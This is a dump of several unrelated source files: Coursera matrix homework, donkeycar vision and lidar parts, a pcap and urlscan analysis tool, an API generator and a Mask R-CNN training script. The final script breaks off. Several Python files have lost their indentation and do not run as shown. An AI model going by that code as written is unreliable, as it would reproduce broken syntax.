>>> find_triangular_matrix_inverse(A) == Mat(({0, 1, 2, 3}, {0, 1, 2, 3}), {(0, 1): -0.5, (1, 2): -0.3, (3, 2): 0.0, (0, 0): 1.0, (3, 3): 1.0, (3, 0): 0.0, (3, 1): 0.0, (2, 1): 0.0, (0, 2): -0.05000000000000002, (2, 0): 0.0, (1, 3): -0.87, (2, 3): -0.1, (2, 2): 1.0, (1, 0): 0.0, (0, 3): -3.545, (1, 1): 1.0})
True
'''
pass
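# A sketch via back-substitution, one identity column at a time (assumes
# triangular.triangular_solve_n, included later in this repo, and matutil helpers).
def find_triangular_matrix_inverse_sketch(A):
    from matutil import mat2rowdict, coldict2mat
    from triangular import triangular_solve_n
    rowlist = [mat2rowdict(A)[i] for i in sorted(A.D[0])]
    n = len(rowlist)
    # column j of the inverse solves A x = e_j
    cols = {j: triangular_solve_n(rowlist, [1 if i == j else 0 for i in range(n)])
            for j in range(n)}
    return coldict2mat(cols)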
```
#### File: coursera-CodeMatrix/homeworks/06_secret_sharing_lab.py
```python
coursera = 1
# Please fill out this stencil and submit using the provided submission script.
import random
from GF2 import one
from vecutil import list2vec
## 1: (Task 1) Choosing a Secret Vector
def randGF2(): return random.randint(0,1)*one
a0 = list2vec([one, one, 0, one, 0, one])
b0 = list2vec([one, one, 0, 0, 0, one])
def choose_secret_vector(s,t):
pass
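# A possible sketch: rejection-sample random GF(2) vectors until both required
# dot products hold (uses the a0, b0 and randGF2 defined above).
def choose_secret_vector_sketch(s, t):
    while True:
        u = list2vec([randGF2() for _ in range(6)])
        if a0 * u == s and b0 * u == t:
            return u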
## 2: (Task 2) Finding Secret Sharing Vectors
# Give each vector as a Vec instance
secret_a0 = ...
secret_b0 = ...
secret_a1 = ...
secret_b1 = ...
secret_a2 = ...
secret_b2 = ...
secret_a3 = ...
secret_b3 = ...
secret_a4 = ...
secret_b4 = ...
```
#### File: coursera-CodeMatrix/homeworks/plotting.py
```python
import webbrowser
from numbers import Number
import tempfile
import os
import atexit
_browser = None
def plot(L, scale=4, dot_size = 3, browser=None):
""" plot takes a list of points, optionally a scale (relative to a 200x200 frame),
optionally a dot size (diameter) in pixels, and optionally a browser name.
It produces an html file with SVG representing the given plot,
and opens the file in a web browser. It returns nothing.
"""
scalar = 200./scale
origin = (210, 210)
hpath = create_temp('.html')
with open(hpath, 'w') as h:
h.writelines(
['<!DOCTYPE html>\n'
,'<head>\n'
,'<title>plot</title>\n'
,'</head>\n'
,'<body>\n'
,'<svg height="420" width="420" xmlns="http://www.w3.org/2000/svg">\n'
,'<line x1="0" y1="210" x2="420" y2="210"'
,'style="stroke:rgb(0,0,0);stroke-width:2"/>\n'
,'<line x1="210" y1="0" x2="210" y2="420"'
,'style="stroke:rgb(0,0,0);stroke-width:2"/>\n'])
for pt in L:
if isinstance(pt, Number):
x,y = pt.real, pt.imag
else:
if isinstance(pt, tuple) or isinstance(pt, list):
x,y = pt
else:
raise ValueError
h.writelines(['<circle cx="%d" cy="%d" r="%d" fill="red"/>\n'
% (origin[0]+scalar*x,origin[1]-scalar*y,dot_size)])
h.writelines(['</svg>\n</body>\n</html>'])
if browser is None:
browser = _browser
webbrowser.get(browser).open('file://%s' % hpath)
def setbrowser(browser=None):
""" Registers the given browser and saves it as the module default.
This is used to control which browser is used to display the plot.
The argument should be a value that can be passed to webbrowser.get()
to obtain a browser. If no argument is given, the default is reset
to the system default.
webbrowser provides some predefined browser names, including:
'firefox'
'opera'
If the browser string contains '%s', it is interpreted as a literal
browser command line. The URL will be substituted for '%s' in the command.
For example:
'google-chrome %s'
'cmd "start iexplore.exe %s"'
See the webbrowser documentation for more detailed information.
Note: Safari does not reliably work with the webbrowser module,
so we recommend using a different browser.
"""
global _browser
if browser is None:
_browser = None # Use system default
else:
webbrowser.register(browser, None, webbrowser.get(browser))
_browser = browser
def getbrowser():
""" Returns the module's default browser """
return _browser
# Create a temporary file that will be removed at exit
# Returns a path to the file
def create_temp(suffix='', prefix='tmp', dir=None):
_f, path = tempfile.mkstemp(suffix, prefix, dir)
os.close(_f)
remove_at_exit(path)
return path
# Register a file to be removed at exit
def remove_at_exit(path):
atexit.register(os.remove, path)
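# Example usage (a quick illustration, not part of the original module):
#   from plotting import plot
#   plot([(x / 10, (x / 10) ** 2) for x in range(-20, 21)], scale=4)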
```
#### File: coursera-CodeMatrix/homeworks/read_data.py
```python
from vec import Vec
from mat import Mat
def read_vectors(filename):
"""File should have the following format:
First line should consist of labels, separated by tabs or spaces.
Remaining lines should consist of numeric data.
Procedure returns a list of Vecs, one for each line of numeric data.
The labels for the Vecs are the strings given in the first line.
"""
with open(filename) as file:
labels = file.readline().split()
vlist = [Vec(set(labels), dict(zip(labels, map(float, line.split())))) for line in file]
return vlist
def read_matrix(filename):
"""File should have the following format:
First line should consist of column labels, separated by tabs or spaces.
Each subsequent line should consist of a row label followed by numeric data.
Procedure returns a matrix with the given row and column labels and numeric data
"""
with open(filename) as file:
col_labels = file.readline().split()
row_labels = set()
f = {}
for line in file:
entries = line.split()
row_label = entries[0]
row_labels.add(row_label)
for col, entry in zip(col_labels, entries[1:]):
f[row_label, col] = entry
return Mat((row_labels, set(col_labels)), f)
def read_vector(filename):
"""File should have the following format:
Each line consists of a label followed by a single numeric value, separated by whitespace
Procedure returns a vector with one entry per line of the file
"""
with open(filename) as file:
func = {k: float(v) for k,v in (line.split() for line in file)}
domain = set(func.keys())
return Vec(domain, func)
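# Example usage (hypothetical file names):
#   vecs = read_vectors('age_height.txt')  # first line labels, numeric rows below
#   M = read_matrix('matrix.txt')          # column labels, then row-labelled rows
#   b = read_vector('rhs.txt')             # one "label value" pair per line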
```
#### File: coursera-CodeMatrix/homeworks/vecutil.py
```python
from vec import Vec
def list2vec(L):
"""Given a list L of field elements, return a Vec with domain {0...len(L)-1}
whose entry i is L[i]
>>> list2vec([10, 20, 30])
Vec({0, 1, 2},{0: 10, 1: 20, 2: 30})
"""
return Vec(set(range(len(L))), {k:L[k] for k in range(len(L))})
def zero_vec(D):
"""Returns a zero vector with the given domain
"""
return Vec(D, {})
```
#### File: JediKoder/coursera-CodeMatrix/triangular.py
```python
from vec import Vec
from vecutil import zero_vec
def triangular_solve_n(rowlist, b):
    """Solve an upper-triangular system by back-substitution; rowlist[j] is
    row j of the matrix and b[j] the corresponding right-hand-side entry."""
D = rowlist[0].D
n = len(D)
assert D == set(range(n))
x = zero_vec(D)
for j in reversed(range(n)):
x[j] = (b[j] - rowlist[j] * x)/rowlist[j][j]
return x
def triangular_solve(rowlist, label_list, b):
    """Back-substitution when the columns carry arbitrary labels;
    label_list[j] is the label of the column whose pivot sits in row j."""
D = rowlist[0].D
x = zero_vec(D)
for j in reversed(range(len(D))):
c = label_list[j]
row = rowlist[j]
x[c] = (b[j] - x*row)/row[c]
return x
```
|
{
"source": "JediLuke/rufus",
"score": 3
}
|
#### File: donkeycar/parts/cv.py
```python
import cv2
import numpy as np
class BirdsEyePerspectiveTxfrm():
#http://www.coldvision.io/2017/03/02/advanced-lane-finding-using-opencv/
def compute_perspective_transform(self, binary_image):
# Get input image dimensions
shape = binary_image.shape[::-1] # (width,height)
w = shape[0]
h = shape[1]
# print("w: " + str(w) + " h: " + str(h)) # w: 160 h: 120
# We take the input image as a trapezoid (i.e. it has perspective) and project/transform it into a square shape (i.e. flat)
# The 4 points that select quadilateral on the input , from top-left in clockwise order
transform_src = np.float32([ [int(w/5),int(4*h/10)], [int(5*w/6),int(4*h/10)], [w,h], [0,h] ])
#transform_src = np.float32([ [-100,-100], [w+100,-100], [w+100,h+100], [-100,h+100] ])
        transform_dst = np.float32([ [0,0], [w,0], [w,h], [0,h] ])  # map onto the full frame; the original's duplicated [w,h] corners made the transform degenerate
M = cv2.getPerspectiveTransform(transform_src, transform_dst)
return M
def run(self, img_arr):
M = self.compute_perspective_transform(img_arr)
return cv2.warpPerspective(img_arr, M, (img_arr.shape[1], img_arr.shape[0]), flags=cv2.INTER_NEAREST) # keep same size as input image
class AdaptiveThreshold():
def __init__(self, high_threshold=255):
self.high_threshold = high_threshold
def run(self, img_arr):
return cv2.adaptiveThreshold(img_arr, self.high_threshold,
cv2.ADAPTIVE_THRESH_MEAN_C, cv2.THRESH_BINARY, 115, 1)
class DrawLine():
def __init__(self, line_start, line_finish):
self.line_start = line_start
self.line_finish = line_finish
def run(self, img_arr):
return cv2.line(img_arr, self.line_start, self.line_finish, (255,0,0), 5)
#Luke's NOTE: Simulator fundamentally doesn't work in a way to support this :(
# class SimulatorLink:
# """
# Wrapper around SteeringServer, which allows us to place the Simulator
# in the Vehicle event loop/pipeline.
# """
# def __init__(self, resolution=(120,160), box_size=4, color=(255, 0, 0)):
# self.sio = socketio.Server()
# self.timer = FPSTimer()
# self.top_speed = float(3)
# #Start websocket server
# self._go(('0.0.0.0', 9090))
# def _go(self, address):
# # wrap Flask application with engineio's middleware
# self.app = socketio.Middleware(self.sio, self.app)
# # deploy as an eventlet WSGI server
# try:
# eventlet.wsgi.server(eventlet.listen(address), self.app)
# except KeyboardInterrupt:
# # unless some hits Ctrl+C and then we get this interrupt
# print('stopping')
# def _connect(self, sid, environ):
# print("connect ", sid)
# self.timer.reset()
# self.send_control(0, 0)
# def _throttle_control(self, last_steering, last_throttle, speed, nn_throttle):
# '''
# super basic throttle control, derive from this Server and override as needed
# '''
# if speed < self.top_speed:
# return 0.3
# return 0.0
# def _telemetry(self, sid, data):
# '''
# Callback when we get new data from Unity simulator.
# We use it to process the image, do a forward inference,
# then send controls back to client.
# Takes sid (?) and data, a dictionary of json elements.
# '''
# if data:
# # The current steering angle of the car
# last_steering = float(data["steering_angle"])
# # The current throttle of the car
# last_throttle = float(data["throttle"])
# # The current speed of the car
# speed = float(data["speed"])
# # The current image from the center camera of the car
# imgString = data["image"]
# # decode string based data into bytes, then to Image
# image = Image.open(BytesIO(base64.b64decode(imgString)))
# # then as numpy array
# image_array = np.asarray(image)
# # optional change to pre-preocess image before NN sees it
# if self.image_part is not None:
# image_array = self.image_part.run(image_array)
# # forward pass - inference
# steering, throttle = self.kpart.run(image_array)
# # filter throttle here, as our NN doesn't always do a greate job
# throttle = self._throttle_control(last_steering, last_throttle, speed, throttle)
# # simulator will scale our steering based on it's angle based input.
# # but we have an opportunity for more adjustment here.
# steering *= self.steering_scale
# # send command back to Unity simulator
# self.send_control(steering, throttle)
# else:
# # NOTE: DON'T EDIT THIS.
# self.sio.emit('manual', data={}, skip_sid=True)
# self.timer.on_frame()
# def _send_control(self, steering_angle, throttle):
# self.sio.emit(
# "steer",
# data={
# 'steering_angle': steering_angle.__str__(),
# 'throttle': throttle.__str__()
# },
# skip_sid=True)
# def update(self):
# sio = self.sio
# @sio.on('telemetry')
# self._telemetry(sid, data)
# # def telemetry(sid, data):
# # self.telemetry(sid, data)
# @sio.on('connect')
# self._connect(sid, environ)
# # def connect(sid, environ):
# # self.connect(sid, environ)
# def run_threaded(self):
# return self.data
### Below are official DOnkeycar cv functions
class ImgGreyscale():
def run(self, img_arr):
img_arr = cv2.cvtColor(img_arr, cv2.COLOR_RGB2GRAY)
return img_arr
class ImgCanny():
def __init__(self, low_threshold=60, high_threshold=110):
self.low_threshold = low_threshold
self.high_threshold = high_threshold
def run(self, img_arr):
return cv2.Canny(img_arr,
self.low_threshold,
self.high_threshold)
class ImgGaussianBlur():
    def __init__(self, kernel_size=5):
        self.kernel_size = kernel_size  # was misspelled "kernal_size", which broke run()
    def run(self, img_arr):
        return cv2.GaussianBlur(img_arr,
                                (self.kernel_size, self.kernel_size), 0)
class ImgCrop:
"""
Crop an image to an area of interest.
"""
def __init__(self, top=0, bottom=0, left=0, right=0):
self.top = top
self.bottom = bottom
self.left = left
self.right = right
def run(self, img_arr):
width, height, _ = img_arr.shape
img_arr = img_arr[self.top:height-self.bottom,
self.left: width-self.right]
return img_arr
class ImgStack:
"""
Stack N previous images into a single N channel image, after converting each to grayscale.
The most recent image is the last channel, and pushes previous images towards the front.
"""
def __init__(self, num_channels=3):
self.img_arr = None
self.num_channels = num_channels
def rgb2gray(self, rgb):
'''
take a numpy rgb image return a new single channel image converted to greyscale
'''
return np.dot(rgb[...,:3], [0.299, 0.587, 0.114])
def run(self, img_arr):
width, height, _ = img_arr.shape
gray = self.rgb2gray(img_arr)
if self.img_arr is None:
self.img_arr = np.zeros([width, height, self.num_channels], dtype=np.dtype('B'))
for ch in range(self.num_channels - 1):
self.img_arr[...,ch] = self.img_arr[...,ch+1]
self.img_arr[...,self.num_channels - 1:] = np.reshape(gray, (width, height, 1))
return self.img_arr
class Pipeline():
def __init__(self, steps):
self.steps = steps
def run(self, val):
for step in self.steps:
f = step['f']
args = step['args']
kwargs = step['kwargs']
val = f(val, *args, **kwargs)
return val
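# Example of composing steps into a single chain (hypothetical steps):
#   pipeline = Pipeline([
#       {'f': cv2.GaussianBlur, 'args': [(5, 5), 0], 'kwargs': {}},
#       {'f': cv2.Canny, 'args': [60, 110], 'kwargs': {}},
#   ])
#   edges = pipeline.run(gray_img)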
```
#### File: donkeycar/parts/lidar.py
```python
import time
import numpy as np
class Ultrasonic():
def __init__(self):
# self.sensor = someThing()
self.dist = 1000
def run_threaded(self):
return self.dist
def update(self):
#self.dist = self.sensor.getReading()
print("uSonic dist " + str(self.dist))
self.dist = self.dist - 10
class RPLidar():
def __init__(self, port='/dev/ttyUSB0'):
from rplidar import RPLidar
self.port = port
self.frame = np.zeros(shape=365)
self.lidar = RPLidar(self.port)
self.lidar.clear_input()
time.sleep(1)
self.on = True
def update(self):
self.measurements = self.lidar.iter_measurments(500)
for new_scan, quality, angle, distance in self.measurements:
angle = int(angle)
self.frame[angle] = 2*distance/3 + self.frame[angle]/3
if not self.on:
break
def run_threaded(self):
return self.frame
```
|
{
"source": "Jedimaster4559/CS499-DartBoard",
"score": 3
}
|
#### File: dartboard/backend/models.py
```python
import uuid
from django.db import models
##
# This is a basic model class designed to show backend proof of concept
class DartboardHit(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False)
x = models.IntegerField(default=0)
y = models.IntegerField(default=0)
def __str__(self):
return str(self.x) + ', ' + str(self.y)
```
|
{
"source": "jedimasterbot/ipf-analyzer",
"score": 3
}
|
#### File: ipf-analyzer/sources/pcapgraph.py
```python
import json
from collections import Counter
from scapy.layers.inet import IP
from datetime import datetime
import pandas as pd
import plotly
import plotly.graph_objs as go
from scapy.layers import http
def CountTable(all_ip, public_ip):
    tableIp, tablePubIp = {}, {}
    cnt = Counter(all_ip)  # Counter can consume the iterable directly
    for key, value in cnt.most_common():
        tableIp[key] = value
        if key in public_ip:
            tablePubIp[key] = value
    return tableIp, tablePubIp
def BytesOverTime(packets):
pktBytes = []
pktTimes = []
for pkt in packets:
if IP in pkt:
try:
pktBytes.append(pkt[IP].len)
pktTime = datetime.fromtimestamp(pkt.time)
pktTimes.append(pktTime.strftime('%Y-%m-%d %H:%M:%S.%f'))
except:
pass
dataByte = pd.Series(pktBytes).astype(int)
times = pd.to_datetime(pd.Series(pktTimes).astype(str), errors='coerce')
df = pd.DataFrame({'Bytes': dataByte, 'Time': times})
df = df.set_index('Time')
df2 = df.resample('2S').sum()
trace = [go.Scatter(x=df2.index, y=df2['Bytes'])]
graphJSON = json.dumps(trace, cls=plotly.utils.PlotlyJSONEncoder)
return graphJSON
def SniffUrls(packets):
urls = []
for packet in packets:
if packet.haslayer(http.HTTPRequest):
http_layer = packet.getlayer(http.HTTPRequest)
ip_layer = packet.getlayer(IP)
src, method = ip_layer.fields.get('src'), http_layer.fields.get('Method')
host, path = (http_layer.fields.get('Host')), (http_layer.fields.get('Path'))
method = method.decode('utf-8')
url = (host.decode('utf-8') + path.decode('utf-8'))
urls.append([src, method, f'http://{url}'])
return {'urls': urls}
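# Example usage (assumes a capture file on disk):
#   from scapy.all import rdpcap
#   packets = rdpcap('capture.pcap')
#   print(SniffUrls(packets))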
```
#### File: ipf-analyzer/sources/urlscan.py
```python
import copy
import requests
from common.config import empty
def UrlScanReporter(values, analysis=True):
urlscan_val = []
for usrInput in values:
urlScanFramework = copy.deepcopy(empty)
params = (('q', 'domain:%s' % usrInput),)
response = requests.get('https://urlscan.io/api/v1/search/', params=params)
r = response.json()
if r.get('status'):
pass
elif len(r.get('results')) == 0:
pass
else:
data = (r.get('results')[0])
if analysis:
urlScanFramework.update({'Action On': usrInput})
urlScanFramework.update({'Link': data.get('result')})
urlScanFramework.update({'Screenshot URL': data.get('screenshot')})
urlScanFramework.update({'Indexed At': data.get('indexedAt')})
urlScanFramework.update({'Task Submitted': data.get('task').get('method')})
urlScanFramework.update({'Visibility': data.get('task').get('visibility')})
urlscan_val.append({'URLScan': urlScanFramework})
else:
urlScanFramework.update({'UrlScanLink': data.get('result')})
res = requests.get(data.get('result'))
if res.status_code != 200:
urlScanFramework.update({'UrlScanScore': 'None'})
urlscan_val.append({str(usrInput): urlScanFramework})
else:
scanData = res.json()
urlScanFramework.update({'UrlScanScore': str(scanData.get('verdicts').get('overall').get('score'))})
urlscan_val.append({str(usrInput): urlScanFramework})
return urlscan_val
```
|
{
"source": "jedimatt42/fcmd",
"score": 3
}
|
#### File: jedimatt42/fcmd/makeapi.py
```python
import sys
import re
def get_api_names():
aliases = { }
# return the map of function names included in the api => client alias
with open(sys.argv[1], 'r') as api_lst:
for line in [ n.strip() for n in api_lst.readlines() if len(n) > 1 ]:
parts = line.split(' ')
if len(parts) > 1:
aliases[parts[0]] = parts[1]
else:
aliases[parts[0]] = parts[0]
return aliases
def get_api_banks():
# return a map of function name => bank switch address
bank_map = { }
pat = re.compile(r"DECLARE_BANKED(_VOID)?\((\w+), BANK\((\d+)\)")
with open(sys.argv[3], 'r') as api_banks:
for line in api_banks.readlines():
# b8_terminal.h:DECLARE_BANKED_VOID(tputc, BANK(8), bk_tputc, (int c), (c))
m = pat.search(line)
if m:
bank_map[m.group(2)] = (int(m.group(3)) << 1) + 0x6000
return bank_map
def get_api_decls():
# return map of function name => DECLARE_BANKED statements
sig_map = { }
pat = re.compile(r"DECLARE_BANKED_VOID?\((\w+),\s*BANK\(\d+\),\s*\w+,\s*(\([^\)]*\)),\s*(\([^\)]*\))\)")
# group 1 : function name
# group 2 : argument signatures
# group 3 : argument names
retpat = re.compile(r"DECLARE_BANKED?\((\w+),\s*BANK\(\d+\),\s*([^,]+),\s*\w+,\s*(\([^\)]*\)),\s*(\([^\)]*\))\)")
# group 1 : function name
# group 2 : return type
# group 3 : argument signatures
# group 4 : argument names
with open(sys.argv[3], 'r') as api_banks:
for line in api_banks.readlines():
m = pat.search(line)
if m:
sig_map[m.group(1)] = ('void', m.group(2), m.group(3))
else:
m = retpat.search(line)
if m:
sig_map[m.group(1)] = (m.group(2), m.group(3), m.group(4))
return sig_map
# Load all the names from api.lst
aliases = get_api_names()
names = aliases.keys()
# build a map of the function name to bank address
banks = get_api_banks()
# Compose and write the api function lookup table assembly file
with open(sys.argv[2], 'w') as api_asm:
api_asm.write(f"\tref\tfc_api\n")
for name in names:
api_asm.write(f"\tref\t{name}\n")
api_asm.write("\n")
api_asm.write(f"\tdata fc_api\n")
for name in names:
api_asm.write(f"\tdata {name},{banks[name]}\n")
# load the signatures
signatures = get_api_decls()
# Create the client gcc include file
with open(sys.argv[4], 'w') as client_api_h:
# copy the 'template' preample
with open('fc_api_template', 'r') as preamble:
for line in preamble.readlines():
client_api_h.write(line)
fn = 0x6082
for name in names:
# For each function define the table address
#
# #define FC_TPUTC 0x6082
def_name = f'fc_{aliases[name]}'.upper()
client_api_h.write(f'#define {def_name} {hex(fn)}\n')
fn += 4
for name in names:
# For each function write something like:
#
# // declare function: void fc_tputc(int value);
# DECL_FC_API_CALL(FC_TPUTC, fc_tputc, void, (int value), (value))
sig = signatures[name]
fc_name = f'fc_{aliases[name]}'
client_api_h.write(f'\n// function: {sig[0]} {fc_name}{sig[1]}\n')
client_api_h.write(f'DECL_FC_API_CALL({fc_name.upper()}, {fc_name}, {sig[0]}, {sig[1]}, {sig[2]})\n')
# end the include file ifndef
client_api_h.write('\n#endif\n')
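# Invocation sketch, matching the sys.argv order read above (file names are
# hypothetical):
#   python makeapi.py api.lst fc_api.asm banked_decls.h fc_api.h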
```
|
{
"source": "jedimatt42/language-formatters-pre-commit-hooks",
"score": 2
}
|
#### File: language-formatters-pre-commit-hooks/tests/__init__.py
```python
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import os
import typing
from contextlib import contextmanager
from posixpath import basename
from shutil import copyfile
import py
F = typing.TypeVar("F", bound=typing.Callable)
@contextmanager
def change_dir_context(directory: str) -> typing.Generator[None, None, None]:
working_directory = os.getcwd()
try:
os.chdir(directory)
yield
finally:
os.chdir(working_directory)
@contextmanager
def undecorate_function(func: F) -> typing.Generator[F, None, None]:
passed_function = func
func = getattr(passed_function, "__wrapped__", passed_function)
yield func
func = passed_function
def __read_file(path: str) -> str:
with open(path) as f:
return "".join(f.readlines())
def run_autofix_test(
tmpdir: py.path.local,
method: typing.Callable[[typing.List[str]], int],
not_pretty_formatted_path: str,
formatted_path: str,
) -> None:
tmpdir.mkdir("src")
not_pretty_formatted_tmp_path = tmpdir.join("src").join(basename(not_pretty_formatted_path)).strpath
copyfile(not_pretty_formatted_path, not_pretty_formatted_tmp_path)
with change_dir_context(tmpdir.strpath):
assert method(["--autofix", not_pretty_formatted_tmp_path]) == 1
# file was formatted (shouldn't trigger linter again)
with change_dir_context(tmpdir.strpath):
assert method(["--autofix", not_pretty_formatted_tmp_path]) == 0
assert __read_file(not_pretty_formatted_tmp_path) == __read_file(formatted_path)
```
|
{
"source": "jedimud/tintin-data",
"score": 3
}
|
#### File: tintin-data/py/item_sac_csv.py
```python
from item_data import ItemData
from item_slot import ItemSlot
from item_align import ItemAlign
from item_class import ItemClass
from item_affect import ItemAffect
from item_tag import ItemTag
import json
import os
import csv
class ItemSacCSV():
def __init__(self):
self.item_data = ItemData()
def write_to_file(self):
data = []
# header
        h = 'Name,,Limited,Sac,'  # trailing comma keeps the header aligned with the 5-column rows below
data.append(h.split(','))
# data
for item in sorted(list({v['name']: v for v in self.item_data.load_items()}.values()), key=lambda i: i['sac'], reverse=True):
row = []
# name
row.append(item['name'])
row.append('')
# limited
found = False
for tag in item['tags']:
if ItemTag(tag) == ItemTag.LIMITED:
row.append('X')
found = True
break
if not found:
row.append('')
# sac
sac = item['sac']
row.append(sac)
row.append('')
# cr
if sac > 0:
data.append(row)
with open('data/item-sac.csv', mode='w') as f:
writer = csv.writer(
f, delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL)
for row in data:
writer.writerow(row)
if __name__ == '__main__':
ItemSacCSV().write_to_file()
```
#### File: tintin-data/py/item_type.py
```python
from enum import Enum, unique
@unique
class ItemType(Enum):
AIRSHIP = "AIRSHIP", "airship"
ARMOR = "ARMOR", "armor"
BOAT = "BOAT", "boat"
CONTAINER = "CONTAINER", "container"
FOOD = "FOOD", "food"
LIQ_CONTAINER = "LIQ-CONTAINER", "liq-container"
OTHER = "OTHER", "other"
POTION = "POTION", "potion"
SCROLL = "SCROLL", "scroll"
STAFF = "STAFF", "staff"
WAND = "WAND", "wand"
WORN = "WORN", "worn"
LIGHT = "LIGHT", "light"
WEAPON = "WEAPON", "weapon"
KEY = "KEY", "key"
FIRE_WEAPON = "FIRE-WEAPON", "fire-weapon"
TREASURE = "TREASURE", "treasure"
MISSILE = "MISSILE", "missile"
TRASH = "TRASH", "trash"
NOTE = "NOTE", "note"
UNDEFINED = "UNDEFINED", "undefined"
PEN = "PEN", "pen"
def __new__(cls, *args, **kwds):
obj = object.__new__(cls)
obj._value_ = args[0]
return obj
def __init__(self, _: str, brief: str = None):
self._brief_ = brief
def __str__(self):
return self.value
@property
def brief(self):
return self._brief_
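# Example: each member carries both its canonical value and a brief form:
#   str(ItemType.FIRE_WEAPON)   -> 'FIRE-WEAPON'
#   ItemType.FIRE_WEAPON.brief  -> 'fire-weapon'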
```
|
{
"source": "jediofgever/Mask_RCNN",
"score": 2
}
|
#### File: Mask_RCNN/motor_part/maskrcnn_train.py
```python
import os
import sys
import json
import datetime
import numpy as np
import skimage.draw
import skimage.io  # imread is used below when sizing annotated images
import cv2
from skimage import img_as_ubyte
from skimage.draw import rectangle
from skimage.color import rgb2xyz
import random
# Root directory of the project
ROOT_DIR = os.path.abspath("../")
print(ROOT_DIR)
# Import Mask RCNN
sys.path.append(ROOT_DIR) # To find local version of the library
from mrcnn.config import Config
from mrcnn import model as modellib, utils
# Path to trained weights file
COCO_WEIGHTS_PATH = ROOT_DIR + "/logs/real_data_30_epoch.h5"
TRAIN_JSON_FILE = "/home/royle/catkin_ws/ws_py3_nn/src/CNN_DETS_PICKPLACE/Mask_RCNN/data/labels.json"
TRANSFER_WEIGHTS ="coco"
DATASET_DIR = "/home/royle/catkin_ws/ws_py3_nn/src/CNN_DETS_PICKPLACE/Mask_RCNN/data/"
# Directory to save logs and model checkpoints, if not provided
# through the command line argument --logs
DEFAULT_LOGS_DIR = os.path.join(ROOT_DIR, "logs")
############################################################
# Configurations
############################################################
class MotorPartConfig(Config):
"""Configuration for training on the toy dataset.
Derives from the base Config class and overrides some values.
"""
GPU_COUNT = 1
# Give the configuration a recognizable name
NAME = "motor_part"
# We use a GPU with 12GB memory, which can fit two images.
# Adjust down if you use a smaller GPU.
IMAGES_PER_GPU = 2
# Number of classes (including background)
    NUM_CLASSES = 1 + 1  # Background + motor_part
# Number of training steps per epoch
STEPS_PER_EPOCH = 100
# Skip detections with < 90% confidence
DETECTION_MIN_CONFIDENCE = 0.9
IMAGE_RESIZE_MODE = "square"
BATCH_SIZE = 1
############################################################
# Dataset
############################################################
class MotorPartDataset(utils.Dataset):
def load_motor_part(self, dataset_dir):
"""Load a subset of the Balloon dataset.
dataset_dir: Root directory of the dataset.
subset: Subset to load: train or val
"""
# Add classes. We have only one class to add.
self.add_class("motor_part", 1, "motor_part")
# Load annotations
# VGG Image Annotator (up to version 1.6) saves each image in the form:
# { 'filename': '28503151_5b5b7ec140_b.jpg',
# 'regions': {
# '0': {
# 'region_attributes': {},
# 'shape_attributes': {
# 'all_points_x': [...],
# 'all_points_y': [...],
# 'name': 'polygon'}},
# ... more regions ...
# },
# 'size': 100202
# }
# We mostly care about the x and y coordinates of each region
# Note: In VIA 2.0, regions was changed from a dict to a list.
with open(TRAIN_JSON_FILE, 'r') as myfile:
data=myfile.read()
# parse file
annotations = json.loads(data)
# The VIA tool saves images in the JSON even if they don't have any
# annotations. Skip unannotated images.
#annotations = [a for a in annotations if a['regions']]
via_1_check = annotations.get('regions')
via_2_check = annotations.get('_via_img_metadata')
# JSON is formatted with VIA-1.x
if via_1_check:
annotations = list(annotations.values())
# JSON is formatted with VIA-2.x
elif via_2_check:
annotations = list(annotations['_via_img_metadata'].values())
# Unknown JSON formatting
else:
raise ValueError('The JSON provided is not in a recognised via-1.x or via-2.x format.')
#annotations = [a for a in annotations if a['regions']]
# Add images
for a in annotations:
# Get the x, y coordinaets of points of the polygons that make up
# the outline of each object instance. These are stores in the
# shape_attributes (see json format above)
# The if condition is needed to support VIA versions 1.x and 2.x.
if type(a['regions']) is dict:
polygons = [r['shape_attributes'] for r in a['regions'].values()]
else:
polygons = [r['shape_attributes'] for r in a['regions']]
# load_mask() needs the image size to convert polygons to masks.
# Unfortunately, VIA doesn't include it in JSON, so we must read
# the image. This is only managable since the dataset is tiny.
image_path = os.path.join(dataset_dir, a['filename'])
image = skimage.io.imread(image_path)
height, width = image.shape[:2]
self.add_image(
"motor_part",
image_id=a['filename'], # use file name as a unique image id
path=image_path,
width=width, height=height,
polygons=polygons)
def load_mask(self, image_id):
"""Generate instance masks for an image.
Returns:
masks: A bool array of shape [height, width, instance count] with
one mask per instance.
class_ids: a 1D array of class IDs of the instance masks.
"""
        # If not a motor part dataset image, delegate to parent class.
image_info = self.image_info[image_id]
if image_info["source"] != "motor_part":
return super(self.__class__, self).load_mask(image_id)
# Convert polygons to a bitmap mask of shape
# [height, width, instance_count]
info = self.image_info[image_id]
mask = np.zeros([info["height"], info["width"], len(info["polygons"])],
dtype=np.uint8)
for i, p in enumerate(info["polygons"]):
# Get indexes of pixels inside the polygon and set them to 1
rr, cc = skimage.draw.polygon(p['all_points_y'], p['all_points_x'])
mask[rr, cc, i] = 1
# Return mask, and array of class IDs of each instance. Since we have
# one class ID only, we return an array of 1s
return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32)
def image_reference(self, image_id):
"""Return the path of the image."""
info = self.image_info[image_id]
if info["source"] == "motor_part":
return info["path"]
else:
super(self.__class__, self).image_reference(image_id)
def train(model):
"""Train the model."""
# Training dataset.
dataset_train = MotorPartDataset()
dataset_train.load_motor_part(DATASET_DIR)
dataset_train.prepare()
# Validation dataset
dataset_val = MotorPartDataset()
dataset_val.load_motor_part(DATASET_DIR)
dataset_val.prepare()
# *** This training schedule is an example. Update to your needs ***
# Since we're using a very small dataset, and starting from
# COCO trained weights, we don't need to train too long. Also,
# no need to train all layers, just the heads should do it.
print("Training network heads")
model.train(dataset_train, dataset_val,
learning_rate=config.LEARNING_RATE,
epochs=1,
layers='heads')
############################################################
# Training
############################################################
if __name__ == '__main__':
import argparse
config = MotorPartConfig()
config.display()
model = modellib.MaskRCNN(mode="training", config=config,
model_dir=DEFAULT_LOGS_DIR)
# Select weights file to load
if TRANSFER_WEIGHTS == "coco":
weights_path = COCO_WEIGHTS_PATH
# Download weights file
if not os.path.exists(weights_path):
utils.download_trained_weights(weights_path)
elif TRANSFER_WEIGHTS == "last":
# Find last trained weights
weights_path = model.find_last()
elif TRANSFER_WEIGHTS == "imagenet":
# Start from ImageNet trained weights
weights_path = model.get_imagenet_weights()
# Load weights
print("Loading weights ", weights_path)
